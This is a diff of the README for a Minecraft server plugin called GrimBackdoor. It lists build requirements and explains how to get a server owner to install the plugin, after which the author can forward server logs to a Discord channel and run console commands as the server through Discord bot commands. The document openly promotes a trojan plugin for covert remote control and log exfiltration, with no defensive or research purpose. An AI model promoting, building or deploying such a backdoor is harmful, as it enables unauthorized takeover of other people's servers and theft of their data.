KuzeySRC/GrimBackdoor/README.md

 # Minecraft-Backdoor
 Made by KuzeySRC (15w30x)

+Requirements:
+Apache Maven 3.9.9/4.0.0
+Java 16

 Features:

 You can transfer the logs from the server where Backdoor is installed to the discord channel. (!logekle)

 You can use commands as Server. (!konsolekle)

+How to Setup the console:

+Build the plugin and make a server owner installs this plugin to his server.
+After that if he installed this plugin on to his server the bot will activated.
+Then just type "!konsolekle (channel id)" or "!logekle (channel id)"

 Example: ban 15w30x